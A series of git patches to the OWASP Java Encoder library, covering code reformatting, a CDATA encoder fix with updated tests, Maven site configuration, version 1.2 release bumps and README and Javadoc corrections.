~ - // Note: (1L << n) - 1 is bit arithmetic to get n 1 bits. // e.g. (1L << 10) = binary 10000000000 // binary 10000000000 = 1111111111 - /** - * RFC 3986 Unreserved Characters. The first 64. + * RFC 3986 Unreserved Characters. The first 64. * 
          *     unreserved  = ALPHA / DIGIT / "-" / "." / "_" / "~"
      *
    */ - static final long UNRESERVED_MASK_LOW = - (((1L << CHARS_0_TO_9) - 1) << '0') | (1L << '-') | (1L << '.'); + static final long UNRESERVED_MASK_LOW + = (((1L << CHARS_0_TO_9) - 1) << '0') | (1L << '-') | (1L << '.'); /** - * RFC 3986 Unreserved Characters. The second 64. + * RFC 3986 Unreserved Characters. The second 64. * 
          *     unreserved  = ALPHA / DIGIT / "-" / "." / "_" / "~"
      *
    */ - static final long UNRESERVED_MASK_HIGH = - (((1L << CHARS_A_TO_Z) - 1) << ('a' - LONG_BITS)) | - (((1L << CHARS_A_TO_Z) - 1) << ('A' - LONG_BITS)) | - (1L << ('_' - LONG_BITS)) | (1L << ('~' - LONG_BITS)); - + static final long UNRESERVED_MASK_HIGH + = (((1L << CHARS_A_TO_Z) - 1) << ('a' - LONG_BITS)) + | (((1L << CHARS_A_TO_Z) - 1) << ('A' - LONG_BITS)) + | (1L << ('_' - LONG_BITS)) | (1L << ('~' - LONG_BITS)); /** - * RFC 3986 Reserved Characters. The first 64. + * RFC 3986 Reserved Characters. The first 64. * 
          *   reserved    = gen-delims / sub-delims
      *
@@ -156,44 +149,44 @@ class URIEncoder extends Encoder {
      *               / "*" / "+" / "," / ";" / "="
      *
    */ - static final long RESERVED_MASK_LOW = - // gen-delims - (1L << ':') | (1L << '/') | (1L << '?') | (1L << '#') | - // sub-delims - (1L << '!') | (1L << '$') | (1L << '&') | (1L << '\'') | - (1L << '(') | (1L << ')') | (1L << '*') | (1L << '+') | - (1L << ',') | (1L << ';') | (1L << '='); + static final long RESERVED_MASK_LOW + = // gen-delims + (1L << ':') | (1L << '/') | (1L << '?') | (1L << '#') + | // sub-delims + (1L << '!') | (1L << '$') | (1L << '&') | (1L << '\'') + | (1L << '(') | (1L << ')') | (1L << '*') | (1L << '+') + | (1L << ',') | (1L << ';') | (1L << '='); /** * The second 64 RFC 3986 Reserved characters. */ - static final long RESERVED_MASK_HIGH = - // gen-delims - (1L << ('[' - LONG_BITS)) | (1L << (']' - LONG_BITS)) | (1L << ('@' - LONG_BITS)); + static final long RESERVED_MASK_HIGH + = // gen-delims + (1L << ('[' - LONG_BITS)) | (1L << (']' - LONG_BITS)) | (1L << ('@' - LONG_BITS)); /** - * Encoding mode of operation for URI encodes. The modes define - * which characters get encoded using %-encoding, and which do + * Encoding mode of operation for URI encodes. The modes define which characters get encoded using %-encoding, and which do * not. */ public static enum Mode { + /** - * In "component" mode, only the unreserved characters are - * left unescaped. Everything else is escaped. + * In "component" mode, only the unreserved characters are left unescaped. Everything else is escaped. */ COMPONENT(UNRESERVED_MASK_LOW, UNRESERVED_MASK_HIGH), /** - * In "full" mode, all unreserved and reserved characters - * are left unescaped. Anything else is escaped. + * In "full" mode, all unreserved and reserved characters are left unescaped. Anything else is escaped. */ FULL_URI(UNRESERVED_MASK_LOW | RESERVED_MASK_LOW, - UNRESERVED_MASK_HIGH | RESERVED_MASK_HIGH), + UNRESERVED_MASK_HIGH | RESERVED_MASK_HIGH),; - ; - - /** The low bit-mask--copied into the _lowMask of the encoder. */ + /** + * The low bit-mask--copied into the _lowMask of the encoder. + */ final long _lowMask; - /** The high bit-mask--copied into the _highMask of the encoder. */ + /** + * The high bit-mask--copied into the _highMask of the encoder. + */ final long _highMask; /** @@ -209,24 +202,29 @@ class URIEncoder extends Encoder { /** * Accessor for the low bit-mask. + * * @return _lowMask */ - long lowMask() { return _lowMask; } + long lowMask() { + return _lowMask; + } + /** * Accessor for the high bit-mask. + * * @return _highMask */ - long highMask() { return _highMask; } + long highMask() { + return _highMask; + } } /** - * The bit-mask of characters that do not need to be escaped, for - * characters with code-points in the range 0 to 63. + * The bit-mask of characters that do not need to be escaped, for characters with code-points in the range 0 to 63. */ private final long _lowMask; /** - * The bit-mask of characters that do not need to be escaped, for - * character with code-points in the range 64 to 127. + * The bit-mask of characters that do not need to be escaped, for character with code-points in the range 64 to 127. */ private final long _highMask; /** @@ -242,8 +240,7 @@ class URIEncoder extends Encoder { } /** - * Constructor for the URIEncoder the specifies the encoding mode - * the URIEncoder will use. + * Constructor for the URIEncoder the specifies the encoding mode the URIEncoder will use. * * @param mode the encoding mode for this encoder. */ @@ -266,13 +263,13 @@ class URIEncoder extends Encoder { @Override protected int firstEncodedOffset(String input, int off, int len) { final int n = off + len; - for (int i=off ; i>> 2*UTF8_SHIFT); + int b1 = UTF8_3_BYTE_FIRST_MSB | (ch >>> 2 * UTF8_SHIFT); out[j++] = '%'; out[j++] = UHEX[b1 >>> HEX_SHIFT]; out[j++] = UHEX[b1 & HEX_MASK]; @@ -342,17 +338,17 @@ class URIEncoder extends Encoder { out[j++] = UHEX[b3 & HEX_MASK]; } else if (ch <= Character.MAX_HIGH_SURROGATE) { // surrogate pair: 2 UTF-16 => 4 UTF-8 bytes - if (i+1 < n) { - if (Character.isLowSurrogate(in[i+1])) { + if (i + 1 < n) { + if (Character.isLowSurrogate(in[i + 1])) { if (j + 4 * PERCENT_ENCODED_LENGTH > m) { return overflow(input, i, output, j); } int cp = Character.toCodePoint(ch, in[++i]); - int b1 = UTF8_4_BYTE_FIRST_MSB | (cp >>> 3*UTF8_SHIFT); + int b1 = UTF8_4_BYTE_FIRST_MSB | (cp >>> 3 * UTF8_SHIFT); out[j++] = '%'; out[j++] = UHEX[b1 >>> HEX_SHIFT]; out[j++] = UHEX[b1 & HEX_MASK]; - int b2 = UTF8_BYTE_MSB | ((cp >>> 2*UTF8_SHIFT) & UTF8_MASK); + int b2 = UTF8_BYTE_MSB | ((cp >>> 2 * UTF8_SHIFT) & UTF8_MASK); out[j++] = '%'; out[j++] = UHEX[b2 >>> HEX_SHIFT]; out[j++] = UHEX[b2 & HEX_MASK]; @@ -392,6 +388,6 @@ class URIEncoder extends Encoder { @Override public String toString() { - return "URIEncoder(mode="+_mode+")"; + return "URIEncoder(mode=" + _mode + ")"; } } diff --git a/core/src/main/java/org/owasp/encoder/XMLCommentEncoder.java b/core/src/main/java/org/owasp/encoder/XMLCommentEncoder.java index 90d057a..54c59b9 100644 --- a/core/src/main/java/org/owasp/encoder/XMLCommentEncoder.java +++ b/core/src/main/java/org/owasp/encoder/XMLCommentEncoder.java @@ -31,26 +31,23 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** - * XMLCommentEncoder -- Encodes for the XML/HTML comment context. The sequence - * "--" is not allowed in comments, and must be removed/replaced. We also must - * be careful of trailing hyphens at end of input, as they could combine with - * the external comment ending sequence "-->" to become "--->", which is also - * invalid. As with all XML-based context, invalid XML characters are not + * XMLCommentEncoder -- Encodes for the XML/HTML comment context. The sequence "--" is not allowed in comments, and must be + * removed/replaced. We also must be careful of trailing hyphens at end of input, as they could combine with the external comment + * ending sequence "-->" to become "--->", which is also invalid. As with all XML-based context, invalid XML characters are not * allowed. * * @author Jeff Ichnowski */ class XMLCommentEncoder extends Encoder { + /** - * This is the character used to replace a hyphen when a sequence - * of hypens is encountered. + * This is the character used to replace a hyphen when a sequence of hypens is encountered. */ static final char HYPHEN_REPLACEMENT = '~'; @@ -63,14 +60,9 @@ class XMLCommentEncoder extends Encoder { // // (Unicode Hyphen) // (Unicode en-dash) - - // Note: HTML comments differ, in that they cannot start with: ">", "->". // On IE, " + - + - - - - + + + + - - - - - - + + + + + + @@ -26,125 +26,125 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + - - - - - - -- cgit v1.2.3 From 16d8da211657835c7b156de38137513f4f26b316 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Wed, 1 Apr 2015 07:12:37 -0400 Subject: initial site setup --- core/src/site/site.xml | 52 +++++++++++++++++++++++++++ esapi/src/site/site.xml | 52 +++++++++++++++++++++++++++ jsp/src/site/site.xml | 52 +++++++++++++++++++++++++++ pom.xml | 41 +++++++++++++++++----- src/site/site.xml | 93 +++++++++++++++++++++++++++++++++++++++++++++++++ 5 files changed, 281 insertions(+), 9 deletions(-) create mode 100644 core/src/site/site.xml create mode 100644 esapi/src/site/site.xml create mode 100644 jsp/src/site/site.xml create mode 100644 src/site/site.xml diff --git a/core/src/site/site.xml b/core/src/site/site.xml new file mode 100644 index 0000000..a382f59 --- /dev/null +++ b/core/src/site/site.xml @@ -0,0 +1,52 @@ + + + + + Encoder + + + + + + + + + + + + \ No newline at end of file diff --git a/esapi/src/site/site.xml b/esapi/src/site/site.xml new file mode 100644 index 0000000..245a9e6 --- /dev/null +++ b/esapi/src/site/site.xml @@ -0,0 +1,52 @@ + + + + + ESAPI + + + + + + + + + + + + \ No newline at end of file diff --git a/jsp/src/site/site.xml b/jsp/src/site/site.xml new file mode 100644 index 0000000..8b36802 --- /dev/null +++ b/jsp/src/site/site.xml @@ -0,0 +1,52 @@ + + + + + JSP + + + + + + + + + + + + \ No newline at end of file diff --git a/pom.xml b/pom.xml index bab992c..684ba19 100755 --- a/pom.xml +++ b/pom.xml @@ -85,7 +85,13 @@ scm:git:git@github.com:jmanico/owasp-java-encoder.git https://github.com/jmanico/owasp-java-encoder - + + + gh-pages + gh-pages + http://jmanico.github.io/owasp-java-encoder + + Owasp-java-encoder-project @@ -112,18 +118,23 @@ Jim Manico + OWASP + https://www.owasp.org/ Architect Developer - - - + Jeremy Long - jeremy.long@gmail.com - - + jeremy.long@owasp.org + OWASP + https://www.owasp.org/ + + developer + + + UTF-8 @@ -293,6 +304,20 @@ + + org.apache.maven.plugins + maven-site-plugin + + + org.apache.maven.doxia + doxia-module-markdown + 1.6 + + + + true + + @@ -375,7 +400,6 @@ src/main/config/checkstyle.xml src/main/config/checkstyle-header.txt - @@ -412,5 +436,4 @@ - diff --git a/src/site/site.xml b/src/site/site.xml new file mode 100644 index 0000000..6a1d289 --- /dev/null +++ b/src/site/site.xml @@ -0,0 +1,93 @@ + + + + + org.apache.maven.skins + maven-fluido-skin + 1.3.1 + + + + true + true + + jmanico/owasp-java-encoder + right + gray + + + + + + OWASP Java Encoder Project + OWASP Java Encoder Project + + + + + + + + + + + + + + + + + + + + + + + + +
    Copyright © 2011-2015 OWASP. All Rights Reserved.
    + + -- cgit v1.2.3 From e18e70ee7d586470932a788c7ef7b40b9ab8052b Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Mon, 6 Apr 2015 18:23:16 -0400 Subject: moved repo to OWASP --- pom.xml | 10 +++++----- src/site/site.xml | 2 +- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/pom.xml b/pom.xml index 684ba19..d31374c 100755 --- a/pom.xml +++ b/pom.xml @@ -81,15 +81,15 @@ - scm:git:git@github.com:jmanico/owasp-java-encoder.git - scm:git:git@github.com:jmanico/owasp-java-encoder.git - https://github.com/jmanico/owasp-java-encoder + scm:git:git@github.com:owasp/owasp-java-encoder.git + scm:git:git@github.com:owasp/owasp-java-encoder.git + https://github.com/owasp/owasp-java-encoder gh-pages gh-pages - http://jmanico.github.io/owasp-java-encoder + http://owasp.github.io/owasp-java-encoder @@ -104,7 +104,7 @@ github - https://github.com/jmanico/owasp-java-encoder/issues + https://github.com/owasp/owasp-java-encoder/issues diff --git a/src/site/site.xml b/src/site/site.xml index 6a1d289..43076a8 100644 --- a/src/site/site.xml +++ b/src/site/site.xml @@ -46,7 +46,7 @@ OF THE POSSIBILITY OF SUCH DAMAGE. true true - jmanico/owasp-java-encoder + owasp/owasp-java-encoder right gray -- cgit v1.2.3 From 59c13e83bff094c636a4ebd88d74516bba8f8c3c Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Wed, 8 Apr 2015 19:42:36 -0400 Subject: minor update to comment unused links --- core/src/site/site.xml | 4 ++-- esapi/src/site/site.xml | 4 ++-- jsp/src/site/site.xml | 4 ++-- src/site/site.xml | 1 - 4 files changed, 6 insertions(+), 7 deletions(-) diff --git a/core/src/site/site.xml b/core/src/site/site.xml index a382f59..b465001 100644 --- a/core/src/site/site.xml +++ b/core/src/site/site.xml @@ -43,10 +43,10 @@ OF THE POSSIBILITY OF SUCH DAMAGE. - + \ No newline at end of file diff --git a/esapi/src/site/site.xml b/esapi/src/site/site.xml index 245a9e6..877ac16 100644 --- a/esapi/src/site/site.xml +++ b/esapi/src/site/site.xml @@ -43,10 +43,10 @@ OF THE POSSIBILITY OF SUCH DAMAGE. - + \ No newline at end of file diff --git a/jsp/src/site/site.xml b/jsp/src/site/site.xml index 8b36802..4b3621d 100644 --- a/jsp/src/site/site.xml +++ b/jsp/src/site/site.xml @@ -43,10 +43,10 @@ OF THE POSSIBILITY OF SUCH DAMAGE. - + \ No newline at end of file diff --git a/src/site/site.xml b/src/site/site.xml index 43076a8..a389c70 100644 --- a/src/site/site.xml +++ b/src/site/site.xml @@ -81,7 +81,6 @@ OF THE POSSIBILITY OF SUCH DAMAGE. - -- cgit v1.2.3 From 671b191178bcfbd2531bbd4c9a3230a5fd039587 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sun, 12 Apr 2015 07:24:56 -0400 Subject: version 1.2 --- core/pom.xml | 2 +- esapi/pom.xml | 2 +- jsp/pom.xml | 2 +- pom.xml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/core/pom.xml b/core/pom.xml index eed4fd7..ed348c9 100644 --- a/core/pom.xml +++ b/core/pom.xml @@ -43,7 +43,7 @@ org.owasp.encoder encoder-parent - 1.2-SNAPSHOT + 1.2 encoder diff --git a/esapi/pom.xml b/esapi/pom.xml index 28118fe..efa0359 100644 --- a/esapi/pom.xml +++ b/esapi/pom.xml @@ -43,7 +43,7 @@ org.owasp.encoder encoder-parent - 1.2-SNAPSHOT + 1.2 encoder-esapi diff --git a/jsp/pom.xml b/jsp/pom.xml index 383bc6a..43bbcaf 100644 --- a/jsp/pom.xml +++ b/jsp/pom.xml @@ -43,7 +43,7 @@ org.owasp.encoder encoder-parent - 1.2-SNAPSHOT + 1.2 encoder-jsp diff --git a/pom.xml b/pom.xml index d31374c..a7285da 100755 --- a/pom.xml +++ b/pom.xml @@ -42,7 +42,7 @@ org.owasp.encoder encoder-parent - 1.2-SNAPSHOT + 1.2 pom OWASP Encoders Parent -- cgit v1.2.3 From 9fa6b40506f540e3eb991a96cfa2547f7e65b5b2 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sun, 12 Apr 2015 07:40:32 -0400 Subject: version 1.2.1-SNAPSHOT --- core/pom.xml | 2 +- esapi/pom.xml | 2 +- jsp/pom.xml | 2 +- pom.xml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/core/pom.xml b/core/pom.xml index ed348c9..7fafdac 100644 --- a/core/pom.xml +++ b/core/pom.xml @@ -43,7 +43,7 @@ org.owasp.encoder encoder-parent - 1.2 + 1.2.1-SNAPSHOT encoder diff --git a/esapi/pom.xml b/esapi/pom.xml index efa0359..def23df 100644 --- a/esapi/pom.xml +++ b/esapi/pom.xml @@ -43,7 +43,7 @@ org.owasp.encoder encoder-parent - 1.2 + 1.2.1-SNAPSHOT encoder-esapi diff --git a/jsp/pom.xml b/jsp/pom.xml index 43bbcaf..1609f91 100644 --- a/jsp/pom.xml +++ b/jsp/pom.xml @@ -43,7 +43,7 @@ org.owasp.encoder encoder-parent - 1.2 + 1.2.1-SNAPSHOT encoder-jsp diff --git a/pom.xml b/pom.xml index a7285da..bb9d7a3 100755 --- a/pom.xml +++ b/pom.xml @@ -42,7 +42,7 @@ org.owasp.encoder encoder-parent - 1.2 + 1.2.1-SNAPSHOT pom OWASP Encoders Parent -- cgit v1.2.3 From 5b60b6d2faf74949720fb1a6e202bb237cb6ecee Mon Sep 17 00:00:00 2001 From: Jim Manico Date: Sun, 12 Apr 2015 12:08:24 -0700 Subject: updating read file --- README.md | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index af278c6..fa48e7a 100644 --- a/README.md +++ b/README.md @@ -6,9 +6,9 @@ For more information on how to use this project, please see https://www.owasp.or Start using the OWASP Java Encoders ----------------------------------- -You can download a JAR from [Maven Central](http://search.maven.org/#search|ga|1|g%3A%22org.owasp.encoder%22%20a%3A%22encoder%22). +You can download a JAR from [Maven Central](https://search.maven.org/#search|ga|1|g%3A%22org.owasp.encoder%22%20a%3A%22encoder%22). -JSP tags and functions are available in the encoder-jsp, also avaiable in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.1.1/encoder-jsp-1.1.1.jar). This jar requires the core library. +JSP tags and functions are available in the encoder-jsp, also avaiable in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.2/encoder-jsp-1.2.jar). This jar requires the core library. The jars are also available in Maven: @@ -16,19 +16,19 @@ The jars are also available in Maven: org.owasp.encoder encoder - 1.1.1 + 1.2 org.owasp.encoder encoder-jsp - 1.1.1 + 1.2 ``` Quick Overview -------------- -The OWASP Java Encoder library is intended for quick contextual encoding with very little overhead, either in performance or usage. To get started, simply add the encoder-1.1.1.jar, import org.owasp.encoder.Encode and start using. +The OWASP Java Encoder library is intended for quick contextual encoding with very little overhead, either in performance or usage. To get started, simply add the encoder-1.2.jar, import org.owasp.encoder.Encode and start using. Example usage: @@ -43,6 +43,9 @@ Happy Encoding! News ---- +### 2015-04-12 - 1.2 Release on GitHub +OWASP Java Encoder has been moved to GitHub. Version 1.2 was also released! + ### 2014-03-31 - Documentation updated Please visit https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project to see detailed documentation and examples on each API use! -- cgit v1.2.3 From b64f02d90a0ad2e829742069729eef98d0e79965 Mon Sep 17 00:00:00 2001 From: Jim Manico Date: Sun, 12 Apr 2015 12:19:22 -0700 Subject: updating read file again --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index fa48e7a..54cb4e4 100644 --- a/README.md +++ b/README.md @@ -8,7 +8,7 @@ Start using the OWASP Java Encoders ----------------------------------- You can download a JAR from [Maven Central](https://search.maven.org/#search|ga|1|g%3A%22org.owasp.encoder%22%20a%3A%22encoder%22). -JSP tags and functions are available in the encoder-jsp, also avaiable in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.2/encoder-jsp-1.2.jar). This jar requires the core library. +JSP tags and functions are available in the encoder-jsp, also available in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.2/encoder-jsp-1.2.jar). This jar requires the core library. The jars are also available in Maven: -- cgit v1.2.3 From 16d1f0dda835a30539b86dbfd2123013f6c2af76 Mon Sep 17 00:00:00 2001 From: EarthCitizen Date: Tue, 20 Oct 2015 17:27:47 -0700 Subject: Fix error in comment --- core/src/main/java/org/owasp/encoder/Encode.java | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/core/src/main/java/org/owasp/encoder/Encode.java b/core/src/main/java/org/owasp/encoder/Encode.java index 46003e0..3befe85 100644 --- a/core/src/main/java/org/owasp/encoder/Encode.java +++ b/core/src/main/java/org/owasp/encoder/Encode.java @@ -913,7 +913,7 @@ public final class Encode { * provide the surrounding quotation characters for the string. * Since this performs additional encoding so it can work in all * of the JavaScript contexts listed, it may be slightly less - * efficient then using one of the methods targetted to a specific + * efficient than using one of the methods targetted to a specific * JavaScript context ({@link #forJavaScriptAttribute(String)}, * {@link #forJavaScriptBlock}, {@link #forJavaScriptSource}). * Unless you are interested in saving a few bytes of output or -- cgit v1.2.3 From cd8a32836be29f1f38255368bc590f8d771306e5 Mon Sep 17 00:00:00 2001 From: Stefan Schueffler Date: Tue, 29 Nov 2016 10:57:46 +0100 Subject: improve CDATA Encoder to not emit intermediate characters between adjacent CDATA sections --- core/src/main/java/org/owasp/encoder/CDATAEncoder.java | 15 +++++++-------- .../src/test/java/org/owasp/encoder/CDATAEncoderTest.java | 8 ++++---- 2 files changed, 11 insertions(+), 12 deletions(-) diff --git a/core/src/main/java/org/owasp/encoder/CDATAEncoder.java b/core/src/main/java/org/owasp/encoder/CDATAEncoder.java index 8702a65..07f54ff 100644 --- a/core/src/main/java/org/owasp/encoder/CDATAEncoder.java +++ b/core/src/main/java/org/owasp/encoder/CDATAEncoder.java @@ -40,10 +40,9 @@ import java.nio.charset.CoderResult; * CDATAEncoder -- encoder for CDATA sections. CDATA sections are generally good for including large blocks of text that contain * characters that normally require encoding (ampersand, quotes, less-than, etc...). The CDATA context however still does not * allow invalid characters, and can be closed by the sequence "]]>". This encoder removes invalid XML characters, and encodes - * "]]>" (to "]]>]]<![CDATA[>"). The result is that the data integrity is maintained, but the code receiving the output will - * have to handle multiple CDATA events with character events between. As an alternate approach, the caller could pre-encode "]]>" - * to something of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then use this encoder to remove any invalid XML - * characters. + * "]]>" (to "]]]]><![CDATA[>"). The result is that the data integrity is maintained, but the code receiving the output will + * have to handle multiple CDATA events. As an alternate approach, the caller could pre-encode "]]>" to something of their + * choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then use this encoder to remove any invalid XML characters. * * @author Jeff Ichnowski */ @@ -53,10 +52,10 @@ class CDATAEncoder extends Encoder { * The encoding of @{code "]]>"}. */ private static final char[] CDATA_END_ENCODED - = "]]>]]".toCharArray(); + = "]]]]>".toCharArray(); /** - * Length of {@code "]]>]]"}. + * Length of {@code "]]]]>"}. */ private static final int CDATA_END_ENCODED_LENGTH = 15; @@ -69,8 +68,8 @@ class CDATAEncoder extends Encoder { protected int maxEncodedLength(int n) { // "]" becomes "]" (1 -> 1) // "]]" becomes "]]" (2 -> 2) - // "]]>" becomes "]]>]]" (3 -> 15) - // "]]>]" becomes "]]>]]]" (3 -> 15 + 1 -> 1) + // "]]>" becomes "]]]]>" (3 -> 15) + // "]]>]" becomes "]]]]>]" (3 -> 15 + 1 -> 1) // ... int worstCase = n / CDATA_END_LENGTH; diff --git a/core/src/test/java/org/owasp/encoder/CDATAEncoderTest.java b/core/src/test/java/org/owasp/encoder/CDATAEncoderTest.java index 3bc060b..5a28cfa 100644 --- a/core/src/test/java/org/owasp/encoder/CDATAEncoderTest.java +++ b/core/src/test/java/org/owasp/encoder/CDATAEncoderTest.java @@ -45,12 +45,12 @@ import junit.framework.TestCase; public class CDATAEncoderTest extends TestCase { public static Test suite() { return new EncoderTestSuiteBuilder(CDATAEncoderTest.class, new CDATAEncoder(), "-safe-", "-]]>-") - .encode("]]>]]", "]]>") + .encode("]]]]>", "]]>") .encode("]", "]") .encode("]]", "]]") - .encode("]]>]]]", "]]>]") - .encode("]]>]]]>", "]]>]>") - .encode("]]>]]>", "]]>>") + .encode("]]]]>]", "]]>]") + .encode("]]]]>]>", "]]>]>") + .encode("]]]]>>", "]]>>") .encode("]]]]]", "]]]]]") .encode("<\"&\'>", "<\"&\'>") // valid in CDATA, not in XML -- cgit v1.2.3 From 4d546b593d4fd233395bab1f95fb8ce3c3c0a208 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Sat, 11 Feb 2017 08:30:47 -0500 Subject: Fixed JavaDoc --- core/src/main/java/org/owasp/encoder/Encode.java | 132 +++++++++++----------- core/src/main/java/org/owasp/encoder/Encoder.java | 2 +- 2 files changed, 67 insertions(+), 67 deletions(-) diff --git a/core/src/main/java/org/owasp/encoder/Encode.java b/core/src/main/java/org/owasp/encoder/Encode.java index 3befe85..3e3dc59 100644 --- a/core/src/main/java/org/owasp/encoder/Encode.java +++ b/core/src/main/java/org/owasp/encoder/Encode.java @@ -43,7 +43,7 @@ import java.nio.charset.CoderResult; * Encode -- fluent interface for contextual encoding. Example usage in a JSP: * * 
    - *     <input value="<%=Encode.forHtml(value)%>" />
+ *     <input value="<%=Encode.forHtml(value)%>" />
  *
    * *

    There are two versions of each contextual encoding method. The first @@ -71,15 +71,15 @@ public final class Encode { * bytes or are writing a framework that utilizes this * package.

    * - *
    Example JSP Usage
    + * Example JSP Usage * 
    -     *     <div><%=Encode.forHtml(unsafeData)%></div>
+     *     <div><%=Encode.forHtml(unsafeData)%></div>
      *
-     *     <input value="<%=Encode.forHtml(unsafeData)%>" />
+     *     <input value="<%=Encode.forHtml(unsafeData)%>" />
      *
    * - *
    Encoding Table
    - * + *
    + * * * * @@ -110,7 +110,7 @@ public final class Encode { * *
    Encoding Table
    Input
    * - *
    Additional Notes
    + * Additional Notes *
      * *
    • The encoding of the greater-than sign ({@code >}) is not @@ -160,12 +160,12 @@ public final class Encode { * HTML attributes. Use either forHtml or forHtmlAttribute for those * methods.

      * - *
      Example JSP Usage
      + * Example JSP Usage * 
      -     *     <div><%=Encode.forHtmlContent(unsafeData)%></div>
+     *     <div><%=Encode.forHtmlContent(unsafeData)%></div>
      *
      - *
      Encoding Table
      - * + *
      + * * * * @@ -188,7 +188,7 @@ public final class Encode { * *
      Encoding Table
      Input
      * - *
      Additional Notes
      + * Additional Notes *
        * *
      • Single-quote character ({@code '}) and double-quote @@ -238,13 +238,13 @@ public final class Encode { /** *

        This method encodes for HTML text attributes.

        * - *
        Example JSP Usage
        + * Example JSP Usage * 
        -     *     <div><%=Encode.forHtml(unsafeData)%></div>
+     *     <div><%=Encode.forHtml(unsafeData)%></div>
      *
        * - *
        Encoding Table
        - * + *
        + * * * * @@ -271,7 +271,7 @@ public final class Encode { * *
        Encoding Table
        Input
        * - *
        Additional Notes
        + * Additional Notes *
          * *
        • Both the single-quote character ({@code '}) and the @@ -339,13 +339,13 @@ public final class Encode { * attempt has been made to optimize this encoding, though it is * still probably faster than other encoding libraries.

          * - *
          Example JSP Usage
          + * Example JSP Usage * 
          -     *     <input value=<%=Encode.forHtmlUnquotedAttribute(input)%> >
+     *     <input value=<%=Encode.forHtmlUnquotedAttribute(input)%> >
      *
          * - *
          Encoding Table
          - * + *
          + * * * * @@ -372,7 +372,7 @@ public final class Encode { * *
          Encoding Table
          Input
          * - *
          Additional Notes
          + * Additional Notes *
            * *
          • The following characters are not encoded: @@ -436,16 +436,16 @@ public final class Encode { * characters. It is safe for use in both style blocks and attributes in * HTML. * - *
            Example JSP Usage
            + * Example JSP Usage * 
            -     *     <div style="background: url('<=Encode.forCssString(...)%>');">
+     *     <div style="background: url('<=Encode.forCssString(...)%>');">
      *
-     *     <style type="text/css">
-     *         background: url('<%=Encode.forCssString(...)%>');
-     *     </style>
+     *     <style type="text/css">
+     *         background: url('<%=Encode.forCssString(...)%>');
+     *     </style>
      *
            * - *
            Encoding Notes
            + * Encoding Notes *
              * *
            • The following characters are encoded using hexidecimal @@ -515,15 +515,15 @@ public final class Encode { * itself. The caller should insure that the URL is safe for embedding * (e.g. input validation) by other means. * - *
              Example JSP Usage
              + * Example JSP Usage * 
              -     *     <div style="background:url(<=Encode.forCssUrl(...)%>);">
+     *     <div style="background:url(<=Encode.forCssUrl(...)%>);">
      *
-     *     <style type="text/css">
-     *         background: url(<%=Encode.forCssUrl(...)%>);
-     *     </style>
+     *     <style type="text/css">
+     *         background: url(<%=Encode.forCssUrl(...)%>);
+     *     </style>
      *
              - *
              Encoding Notes
              + * Encoding Notes *
                * *
              • The following characters are encoded using hexidecimal @@ -592,15 +592,15 @@ public final class Encode { * example a "javascript:" URL provided by a malicious user would be * "properly" escaped, and still execute. * - *
                Encoding Table
                + * Encoding Table *

                The following characters are not encoded:

                * 
                -     * U+20:   !   # $   & ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ;   =   ?
+     * U+20:   !   # $   & ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ;   =   ?
      * U+40: @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [   ]   _
      * U+60:   a b c d e f g h i j k l m n o p q r s t u v w x y z       ~
      *
                * - *
                Encoding Notes
                + * Encoding Notes *
                  * *
                • The single-quote character({@code '}) is not encoded.
                  • @@ -657,12 +657,12 @@ public final class Encode { * interpreted as part of another component. * * 
                  -     *     <a href="http://www.owasp.org/<%=Encode.forUriComponent(...)%>?query#fragment">
+     *     <a href="http://www.owasp.org/<%=Encode.forUriComponent(...)%>?query#fragment">
      *
-     *     <a href="/search?value=<%=Encode.forUriComponent(...)%>&order=1#top">
+     *     <a href="/search?value=<%=Encode.forUriComponent(...)%>&order=1#top">
      *
                  * - *
                  Encoding Table
                  + * Encoding Table *

                  The following characters are not encoded:

                  * 
                        * U+20:                           - .   0 1 2 3 4 5 6 7 8 9
@@ -670,7 +670,7 @@ public final class Encode {
      * U+60:   a b c d e f g h i j k l m n o p q r s t u v w x y z       ~
      *
                  * - *
                  Encoding Notes
                  + * Encoding Notes *
                    * *
                  • Unlike {@link #forUri(String)} this method is safe to be @@ -810,10 +810,10 @@ public final class Encode { * caller will need to come up with their own encode/decode system.

                    * * 
                    -     *     out.println("<?xml version='1.0'?>");
